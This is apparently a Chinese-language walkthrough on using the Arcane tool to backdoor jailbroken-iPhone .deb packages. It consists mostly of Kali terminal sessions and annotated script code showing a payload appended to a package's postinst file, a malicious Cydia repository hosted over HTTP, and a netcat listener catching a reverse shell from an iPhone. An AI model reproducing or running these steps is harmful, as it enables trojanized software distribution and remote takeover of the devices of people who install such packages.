如何使用Arcane将有效载荷嵌入iPhone程序包

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3
[sudo] password for kali:Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]

Fetched 17.0 MB in 4s (3,928 kB/s)Reading package lists... DoneReading package lists... DoneBuilding dependency treeReading state information... Donecoreutils is already the newest version (8.30-3+b1).dpkg is already the newest version (1.19.7kali1).python3 is already the newest version (3.8.2-3).python3 set to manually installed.The following additional packages will be installed:   git-man (1:2.27.0-1)   libbz2-1.0 (1.0.8-3)Suggested packages:   bzip2-doc (1.0.8-3)   git-daemon-run (1:2.27.0-1)   | git-daemon-sysvinit (1:2.27.0-1)   git-doc (1:2.27.0-1)   git-el (1:2.27.0-1)   git-email (1:2.27.0-1)   git-gui (1:2.27.0-1)   gitk (1:2.27.0-1)   gitweb (1:2.27.0-1)   git-cvs (1:2.27.0-1)   git-mediawiki (1:2.27.0-1)   git-svn (1:2.27.0-1)The following packages will be upgraded:   bzip2 (1.0.8-2 => 1.0.8-3)   git (1:2.26.2-1 => 1:2.27.0-1)   git-man (1:2.26.2-1 => 1:2.27.0-1)   libbz2-1.0 (1.0.8-2 => 1.0.8-3)   netcat-traditional (1.10-41.1+b1 => 1.10-45)5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.Need to get 8,643 kB of archives.After this operation, 2,424 kB of additional disk space will be used.Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]Fetched 8,643 kB in 2s (4,982 kB/s)apt-listchanges: Reading changelogs...(Reading database ... 287092 files and directories currently installed.)Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...Setting up libbz2-1.0:amd64 (1.0.8-3) ...(Reading database ... 287092 files and directories currently installed.)Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...Setting up netcat-traditional (1.10-45) ...Setting up bzip2 (1.0.8-3) ...Setting up git-man (1:2.27.0-1) ...Setting up git (1:2.27.0-1) ...Processing triggers for libc-bin (2.30-4) ...Processing triggers for man-db (2.9.1-1) ...Processing triggers for kali-menu (2020.2.2) ...

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...remote: Enumerating objects: 16, done.remote: Counting objects: 100% (16/16), done.remote: Compressing objects: 100% (14/14), done.remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

~$ sudo chown $USER:$USER -R /opt/arcane/

~$ cd /opt/arcane/

~/opt/arcane$ sudo chmod +x arcane.sh

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost <attacker ip> --lport <1337>

  -i, --input   iOS package to backdoor  -f, --file    file containing commands to exec (default: not required)  -h, --lhost   local ip address for nc listener  -p, --lport   local port for netcat listener (default: 1337)  -c, --cydia   generate resources for apt/cydia repository (default: disabled)  -n, --netcat  autostart netcat listener (default: disabled)  -u, --udp     enable udp (default: tcp)  -x, --noart   if you hate awesome ascii art (default: enabled)      --help    you're looking at it

~/opt/arcane$ ls -la samples/

total 400drwxr-xr-x 2 root root   4096 Aug  4 11:32 .drwxr-xr-x 5 root root   4096 Aug  4 11:32 ..-rw-r--r-- 1 root root 100748 Aug  4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb-rw-r--r-- 1 root root 142520 Aug  4 11:32 network-cmds_543-1_iphoneos-arm.deb-rw-r--r-- 1 root root  76688 Aug  4 11:32 sed_4.5-1_iphoneos-arm.deb-rw-r--r-- 1 root root  60866 Aug  4 11:32 top_39-2_iphoneos-arm.deb-rw-r--r-- 1 root root  13810 Aug  4 11:32 whois_5.3.2-1_iphoneos-arm.deb

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages'| awk -v i='https://apt.bingner.com/' '/debs//{print i $2}'https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb...https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.debhttps://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat
  ░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗  ██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝  ███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░  ██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░  ██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗  ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝                 v0.1 by @tokyoneon_

--input:此参数定义所需程序包到后门的文件路径.--lhost:lhost(或localhost)定义为攻击者的IP地址,是必填参数.它告诉后门程序包Kali在网络上的位置.在这种情况下,我的Kali系统位于172.16.16.1.--lport:定义为20001的任意值,lport(或本地端口)告诉后门程序包Netcat侦听端口在哪里.--cydia:此参数指示Arcane生成必要的文件以托管Cydia存储库.--netcat:此参数告诉Arcane使用给定的协议和端口自动启动Netcat侦听器.

~$ ls -la /tmp/cydia/

-rw-r--r--  1 root root    29 Jul 29 14:44 index.html-rw-r--r--  1 root root   639 Jul 29 14:44 Packages-rw-r--r--  1 root root   494 Jul 29 14:44 Packages.bz2-rw-r--r--  1 root root   143 Jul 29 14:44 Release-rw-r--r--  1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

[░] /usr/bin/nc -v -l -p 20001[░] starting netcat listener on port 20001 with tcplistening on [any] 20001 ...172.16.16.25: inverse host lookup failed: Unknown hostconnect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050

arcane> sw_versProductName:    iPhone OSProductVersion: 13.4.1BuildVersion:   17E262arcane> uname -aDarwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwinarcane>

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/├── DEBIAN│   ├── control│   └── postinst└── usr    └── bin        └── whois

# The "control" file template. Most iOS packages will include a# control file. In the event one is not found, Arcane will use the# below template. The `$hacker` variable is used here to occupy# various arbitrary fields.# https://www.debian.org/doc/manuals/maint-guide/dreq.en.htmlcontrolTemp="Package: com.$hacker.backdoorName: $hacker backdoorVersion: 1337Section: appArchitecture: iphoneos-armDescription: A backdoored iOS packageAuthor: $hacker <https://$hacker.github.io/>Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.if [[ ! -f "$tmp/DEBIAN/control" ]]; then    # If no control is detected, create it using the template.    echo "$controlTemp" > "$tmp/DEBIAN/control";    status "created control file" "error with control template";else    # If a control file exists, Arcane will simply rename the package    # as it appears in the list of available Cydia applications. This    # makes the package easier to location in Cydia.    msg "detected control file" succ;    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";    status "modified control file" "error with control";fi;

# The "post-installation" file. This file is generally responsible# for executing commands on the OS after installing the required# files. It's utilized by developers to manage and maintain various# aspects of an installation. Arcane abuses this functionality by# appending malicious Bash commands to the bottom of the file.postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the# postinst file.function inject_backdoor (){    # If --file is used, `cat` the command(s) into the postinst file.    if [[ "$infile" ]]; then        cat "$infile" >> "$postinst";        embed="[$infile]";    else        # If no --file, utilize the simple Bash payload, previously        # defined.        echo -e "$payload" >> "$postinst";        embed="generic shell command";    fi;    status "embedded $embed into postinst" "error embedding backdoor";    chmod 0755 "$postinst"};